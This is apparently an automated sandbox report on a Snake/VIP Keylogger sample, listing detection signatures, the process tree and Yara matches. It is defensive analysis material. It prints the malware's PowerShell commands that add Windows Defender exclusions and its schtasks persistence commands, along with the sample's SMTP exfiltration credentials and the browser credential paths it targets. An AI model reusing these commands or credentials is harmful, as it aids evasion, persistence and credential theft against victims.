Edit tour

Windows Analysis Report
ckHregxJIq.exe

Overview

General Information

Sample name:	ckHregxJIq.exe renamed because original name is a hash value
Original sample name:	0fdc25f5430a61cd969c0bcb2e5ed6965d4eb4dc73374649eeaf5a6b77498d6d.exe
Analysis ID:	1631774
MD5:	883059896b4f09e5a2ba9e0e737c0f9a
SHA1:	04bd4c5913eca0eee07c21324e1478d7c4791355
SHA256:	0fdc25f5430a61cd969c0bcb2e5ed6965d4eb4dc73374649eeaf5a6b77498d6d
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ckHregxJIq.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)

powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5324 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ckHregxJIq.exe (PID: 5320 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)

ckHregxJIq.exe (PID: 5956 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)

aFAsiNcQRJEVeL.exe (PID: 1292 cmdline: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe MD5: 883059896B4F09E5A2BA9E0E737C0F9A)

schtasks.exe (PID: 5492 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aFAsiNcQRJEVeL.exe (PID: 5472 cmdline: "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e630:$a1: get_encryptedPassword 0x2ebb8:$a2: get_encryptedUsername 0x2e2a3:$a3: get_timePasswordChanged 0x2e3ba:$a4: get_passwordField 0x2e646:$a5: set_encryptedPassword 0x31362:$a6: get_passwords 0x316f6:$a7: get_logins 0x3134e:$a8: GetOutlookPasswords 0x30d07:$a9: StartKeylogger 0x3164f:$a10: KeyLoggerEventArgs 0x30da7:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3aa0:$a1: get_encryptedPassword 0x4028:$a2: get_encryptedUsername 0x3713:$a3: get_timePasswordChanged 0x382a:$a4: get_passwordField 0x3ab6:$a5: set_encryptedPassword 0x67d2:$a6: get_passwords 0x6b66:$a7: get_logins 0x67be:$a8: GetOutlookPasswords 0x6177:$a9: StartKeylogger 0x6abf:$a10: KeyLoggerEventArgs 0x6217:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f610:$a1: get_encryptedPassword 0x72430:$a1: get_encryptedPassword 0x2fb98:$a2: get_encryptedUsername 0x729b8:$a2: get_encryptedUsername 0x2f283:$a3: get_timePasswordChanged 0x720a3:$a3: get_timePasswordChanged 0x2f39a:$a4: get_passwordField 0x721ba:$a4: get_passwordField 0x2f626:$a5: set_encryptedPassword 0x72446:$a5: set_encryptedPassword 0x32342:$a6: get_passwords 0x75162:$a6: get_passwords 0x326d6:$a7: get_logins 0x754f6:$a7: get_logins 0x3232e:$a8: GetOutlookPasswords 0x7514e:$a8: GetOutlookPasswords 0x31ce7:$a9: StartKeylogger 0x74b07:$a9: StartKeylogger 0x3262f:$a10: KeyLoggerEventArgs 0x7544f:$a10: KeyLoggerEventArgs 0x31d87:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x370318:$a1: get_encryptedPassword 0x3b3338:$a1: get_encryptedPassword 0x3f6158:$a1: get_encryptedPassword 0x3708a0:$a2: get_encryptedUsername 0x3b38c0:$a2: get_encryptedUsername 0x3f66e0:$a2: get_encryptedUsername 0x36ff8b:$a3: get_timePasswordChanged 0x3b2fab:$a3: get_timePasswordChanged 0x3f5dcb:$a3: get_timePasswordChanged 0x3700a2:$a4: get_passwordField 0x3b30c2:$a4: get_passwordField 0x3f5ee2:$a4: get_passwordField 0x37032e:$a5: set_encryptedPassword 0x3b334e:$a5: set_encryptedPassword 0x3f616e:$a5: set_encryptedPassword 0x37304a:$a6: get_passwords 0x3b606a:$a6: get_passwords 0x3f8e8a:$a6: get_passwords 0x3733de:$a7: get_logins 0x3b63fe:$a7: get_logins 0x3f921e:$a7: get_logins
Process Memory Space: ckHregxJIq.exe PID: 7868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 7868	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 7868	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 7868	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ed61:$a1: get_encryptedPassword 0x3f1fa:$a2: get_encryptedUsername 0x3e9f6:$a3: get_timePasswordChanged 0x3eb01:$a4: get_passwordField 0x3ed77:$a5: set_encryptedPassword 0x41589:$a6: get_passwords 0x41860:$a7: get_logins 0x41575:$a8: GetOutlookPasswords 0x40fb7:$a9: StartKeylogger 0x417ce:$a10: KeyLoggerEventArgs 0x41057:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ckHregxJIq.exe PID: 5956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 5956	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 5956	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ckHregxJIq.exe PID: 5956	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7d963:$a1: get_encryptedPassword 0x7dee1:$a2: get_encryptedUsername 0x7d5e5:$a3: get_timePasswordChanged 0x7d6fc:$a4: get_passwordField 0x7d979:$a5: set_encryptedPassword 0x8063d:$a6: get_passwords 0x809cd:$a7: get_logins 0x80629:$a8: GetOutlookPasswords 0x7ffe2:$a9: StartKeylogger 0x80926:$a10: KeyLoggerEventArgs 0x80082:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcef7:$a1: get_encryptedPassword 0x561af:$a1: get_encryptedPassword 0xd475:$a2: get_encryptedUsername 0x5672d:$a2: get_encryptedUsername 0xcb79:$a3: get_timePasswordChanged 0x55e31:$a3: get_timePasswordChanged 0xcc90:$a4: get_passwordField 0x55f48:$a4: get_passwordField 0xcf0d:$a5: set_encryptedPassword 0x561c5:$a5: set_encryptedPassword 0xfbd1:$a6: get_passwords 0x58e89:$a6: get_passwords 0xff61:$a7: get_logins 0x59219:$a7: get_logins 0xfbbd:$a8: GetOutlookPasswords 0x58e75:$a8: GetOutlookPasswords 0xf576:$a9: StartKeylogger 0x5882e:$a9: StartKeylogger 0xfeba:$a10: KeyLoggerEventArgs 0x59172:$a10: KeyLoggerEventArgs 0xf616:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a971:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abce:$a4: \Orbitum\User Data\Default\Login Data 0x3b5ad:$a5: \Kometa\User Data\Default\Login Data
15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.ckHregxJIq.exe.41d5678.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.ckHregxJIq.exe.41d5678.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.ckHregxJIq.exe.41d5678.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b71:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dce:$a4: \Orbitum\User Data\Default\Login Data 0x397ad:$a5: \Kometa\User Data\Default\Login Data
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.ckHregxJIq.exe.41d5678.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b71:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dce:$a4: \Orbitum\User Data\Default\Login Data 0x397ad:$a5: \Kometa\User Data\Default\Login Data
1.2.ckHregxJIq.exe.41d5678.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b71:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dce:$a4: \Orbitum\User Data\Default\Login Data 0x397ad:$a5: \Kometa\User Data\Default\Login Data
15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.ckHregxJIq.exe.41d5678.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ee:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a971:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d791:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abce:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ee:$a4: \Orbitum\User Data\Default\Login Data 0x3b5ad:$a5: \Kometa\User Data\Default\Login Data 0x7e3cd:$a5: \Kometa\User Data\Default\Login Data
15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ee:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc110e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a971:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d991:$a3: \Google\Chrome\User Data\Default\Login Data 0xc07b1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abce:$a4: \Orbitum\User Data\Default\Login Data 0x7dbee:$a4: \Orbitum\User Data\Default\Login Data 0xc0a0e:$a4: \Orbitum\User Data\Default\Login Data 0x3b5ad:$a5: \Kometa\User Data\Default\Login Data 0x7e5cd:$a5: \Kometa\User Data\Default\Login Data 0xc13ed:$a5: \Kometa\User Data\Default\Login Data
1.2.ckHregxJIq.exe.41d5678.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c4e0:$a1: get_encryptedPassword 0x17f500:$a1: get_encryptedPassword 0x1c2320:$a1: get_encryptedPassword 0x13ca68:$a2: get_encryptedUsername 0x17fa88:$a2: get_encryptedUsername 0x1c28a8:$a2: get_encryptedUsername 0x13c153:$a3: get_timePasswordChanged 0x17f173:$a3: get_timePasswordChanged 0x1c1f93:$a3: get_timePasswordChanged 0x13c26a:$a4: get_passwordField 0x17f28a:$a4: get_passwordField 0x1c20aa:$a4: get_passwordField 0x13c4f6:$a5: set_encryptedPassword 0x17f516:$a5: set_encryptedPassword 0x1c2336:$a5: set_encryptedPassword 0x13f212:$a6: get_passwords 0x182232:$a6: get_passwords 0x1c5052:$a6: get_passwords 0x13f5a6:$a7: get_logins 0x1825c6:$a7: get_logins 0x1c53e6:$a7: get_logins
1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13d8a4:$s1: UnHook 0x1808c4:$s1: UnHook 0x1c36e4:$s1: UnHook 0x13d8ab:$s2: SetHook 0x1808cb:$s2: SetHook 0x1c36eb:$s2: SetHook 0x13d8b3:$s3: CallNextHook 0x1808d3:$s3: CallNextHook 0x1c36f3:$s3: CallNextHook 0x13d8c0:$s4: _hook 0x1808e0:$s4: _hook 0x1c3700:$s4: _hook
1.2.ckHregxJIq.exe.414e258.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ckHregxJIq.exe.414e258.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.ckHregxJIq.exe.414e258.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
